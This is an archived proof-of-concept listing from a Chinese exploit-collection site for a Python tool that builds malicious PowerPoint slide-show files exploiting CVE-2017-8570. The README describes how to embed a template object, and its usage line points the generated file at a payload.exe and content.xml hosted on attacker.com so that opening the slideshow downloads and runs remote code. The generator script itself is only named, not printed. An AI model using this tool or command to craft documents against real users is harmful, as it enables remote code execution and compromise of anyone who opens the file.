支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: 5fc4cd35c9556d55375eb494703fbf5097b73ab5

来源
https://github.com/temesgeny/ppsx-file-generator
关联漏洞
标题:Microsoft Office 安全漏洞 (CVE-2017-8570)
Description:Microsoft Office是美国微软(Microsoft)公司开发的一款办公软件套件产品。常用组件有Word、Excel、Access、Powerpoint、FrontPage等。 Microsoft Office中存在远程代码执行漏洞,该漏洞源于程序没有正确的处理内存中的对象。远程攻击者可借助特制的文件利用该漏洞在当前用户的上下文中执行任意代码或造成拒绝服务。以下版本受到影响:Microsoft Office 2007 SP3,Office 2010 SP2,Office 2013 RT SP1,
Description
ppsx file generator for cve-2017-8570 (based on bhdresh/cve-2017-8570)
介绍
# Introduction
By Temesgen Yibeltal temu1yibeltal@gmail.com (Based on code by https://github.com/bhdresh/CVE-2017-8570 (now removed))

ppsx-file-generator is a python tool that generates a power point slide show file that executes code from a remote source based on an existing file.

# What does it do?

The tool generates a power point slide show file and an xml file based using the input provided. The power point file accesses the xml file which holds information of the payload file. An attacker could serve the xml file and the payload on a local or public server and provide the url for each as input.

# Getting the code

First, get the code:
```
git clone https://github.com/temesgeny/ppsx-file-generator.git
```

ppsx-file-generator is written in Python and requires zipfile which can be installed using Pip:
```
pip install zipfile
```
Requires Microsoft Office Power Point to  carry out this task.

# Usage
First open Microsoft Office Power Point and open 'template.ppsx'. Open your own presentation file and copy the icon 'Coder.exe' from template.ppsx to slide 1 of your power point file. Save the file as Power Point Show (.ppsx). Then use the python tool as

        Usage: generate_ppsx.py input_filename -o output_filename -p payload_uri -x xml_uri

        input_filename          The input ppsx file name.

        -o              Output .ppsx file name, (inlcude the .ppsx).
        -p              The payload exe or sct file url. 
                        It must be in an accessible web server. (Optional for xml file)
        -x              The full xml uri to be called by the ppsx file. 
                        It must be in an accessible web server.(Required)

```
python generate_ppsx.py -o output.ppsx -p http://attacker.com/payload.exe -x http://attacker.com/content.xml input.ppsx
Generated content.xml successfully
Generated output.ppsx successfully
```
文件快照

 [4.0K]  /data/pocs/5fc4cd35c9556d55375eb494703fbf5097b73ab5
├── [8.3K]  generate_ppsx.py
├── [1.8K]  README.md
└── [ 32K]  template.ppsx

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。